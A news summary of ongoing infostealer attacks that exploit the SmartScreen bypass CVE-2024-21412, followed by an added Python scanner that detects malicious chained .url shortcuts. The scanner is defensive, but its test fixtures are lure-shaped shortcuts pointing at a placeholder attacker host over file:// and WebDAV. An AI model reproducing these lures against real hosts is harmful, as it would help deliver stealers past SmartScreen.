July 24, 2024 at 03:11PM
A Microsoft Defender SmartScreen vulnerability (CVE-2024-21412), patched in February, is still being exploited in infostealing attacks worldwide. The SmartScreen bypass lets attackers deliver a download without the usual warning prompt and hide the malicious payload inside image files, after which the stealer harvests data from browsers and a range of other applications. Organizations with delayed Microsoft patch cycles are particularly exposed, underscoring the need for timely security updates.
Key Takeaways:
1. A Microsoft Defender SmartScreen vulnerability, CVE-2024-21412, with an 8.1 CVSS score and “high” severity, was disclosed and patched on Feb. 13. However, it is still being exploited in infostealing attacks worldwide.
2. Known infostealers such as Lumma Stealer and DarkGate have abused CVE-2024-21412, and the Water Hydra threat group was among the first observed exploiting it. Fortinet has now flagged new attacks delivering Meduza Stealer and ACR Stealer. These attacks have impacted the US, Spain, and Thailand.
3. The attackers chain the SmartScreen bypass with PowerShell scripts and with payloads hidden inside image files. Because the bypass suppresses SmartScreen's warning dialog, the download proceeds and the malicious code executes without the user seeing the usual prompt.
4. Unpatched systems are at risk of having stealers planted in legitimate Windows processes, leading to the extraction of a wide range of data, including information from various browsers, crypto wallets, messenger apps, password managers, VPN apps, email clients, and FTP clients.
5. Aamir Lakhani from Fortinet emphasizes the importance of regular patching, particularly for Microsoft software, and urges software vendors to provide users with alerts and notifications for critical security patches.
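The article does not describe the file format the bypass rides on. CVE-2024-21412 is Microsoft's Internet Shortcut Files security feature bypass: a local .url file points at a second .url hosted on an attacker-controlled share, and opening the first fetches and runs the second without the SmartScreen prompt. The following is an added example, not code from the article or from Fortinet: a Python scanner that parses .url files and flags the chained-remote-shortcut shape, so a responder can sweep a Downloads folder or mail-attachment store for lures. The sample shortcuts are constructed; 203.0.113.10 and example.com are placeholder hosts, and the extension list is an assumption about what counts as a second stage.

```python
"""Flag Internet Shortcut (.url) files shaped like the CVE-2024-21412 lure:
a shortcut whose target is another shortcut or executable on a remote share."""
from pathlib import Path
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# Assumed list of second-stage types whose mere opening runs code or chains
# to yet another shortcut (a .url -> .url hop is the CVE-2024-21412 pattern).
SECOND_STAGE_EXTENSIONS = (".url", ".lnk", ".hta", ".exe", ".msi", ".js", ".vbs")


def parse_internet_shortcut(text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut":
            key, sep, value = line.partition("=")
            if sep and key.strip().lower() == "url":
                return value.strip()
    return None


def remote_target(url: str) -> Optional[Tuple[str, str]]:
    """Return (host, path) if the URL points at a remote file share, else None.

    Handles UNC paths, including the WebDAV Mini-Redirector forms
    \\host@80\share and \\host@SSL@443\share, and file:// URLs with a host.
    """
    if url.startswith("\\\\") or url.startswith("//"):
        body = url.replace("/", "\\").lstrip("\\")
        host, _, rest = body.partition("\\")
        return host.split("@")[0], "\\" + rest
    parsed = urlparse(url)
    if parsed.scheme in ("file", "smb", "webdav") and parsed.netloc:
        return parsed.netloc.split("@")[0], parsed.path
    return None


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def assess_shortcut(text: str) -> List[str]:
    """Return findings for one .url file's contents; an empty list means clean."""
    findings: List[str] = []
    url = parse_internet_shortcut(text)
    if url is None:
        return ["no URL= entry in [InternetShortcut] section"]
    remote = remote_target(url)
    if remote:
        host, path = remote
        findings.append(f"target is a remote share on {host}")
        if path.lower().endswith(SECOND_STAGE_EXTENSIONS):
            findings.append(f"remote target is a second-stage file: {_basename(path)}")
    elif urlparse(url).path.lower().endswith(SECOND_STAGE_EXTENSIONS):
        findings.append("HTTP(S) target is a direct download of an executable type")
    return findings


def scan_directory(root: Path) -> Dict[str, List[str]]:
    """Assess every *.url under root; returns only files with findings."""
    results: Dict[str, List[str]] = {}
    for path in root.rglob("*.url"):
        findings = assess_shortcut(path.read_text(encoding="utf-8", errors="replace"))
        if findings:
            results[str(path)] = findings
    return results


# Constructed samples, not taken from any real campaign. 203.0.113.10 is a
# documentation address standing in for an attacker-controlled host.
BENIGN = "[InternetShortcut]\r\nURL=https://example.com/quarterly-report\r\n"
CHAINED_FILE_URL = ("[InternetShortcut]\r\n"
                    "URL=file://203.0.113.10/share/invoice.url\r\n"
                    "IconIndex=0\r\n")
CHAINED_WEBDAV = ("[InternetShortcut]\r\n"
                  "URL=\\\\203.0.113.10@80\\dav\\update.url\r\n")

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN), ("chained-file", CHAINED_FILE_URL),
                         ("chained-webdav", CHAINED_WEBDAV)]:
        print(name, assess_shortcut(sample) or ["clean"])
```

Run `scan_directory(Path.home() / "Downloads")` on a suspect host to list shortcuts worth a closer look. The scanner treats any remote-share target as notable and only escalates to a second-stage finding when the remote file is itself a shortcut or executable; a plain https target that is not an executable type is reported as clean, which keeps the noise down on ordinary browser-created shortcuts.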
In summary, the report highlights the ongoing exploitation of CVE-2024-21412 in infostealing attacks, the methods attackers use to bypass SmartScreen, the consequences for unpatched systems, and the importance of timely patching.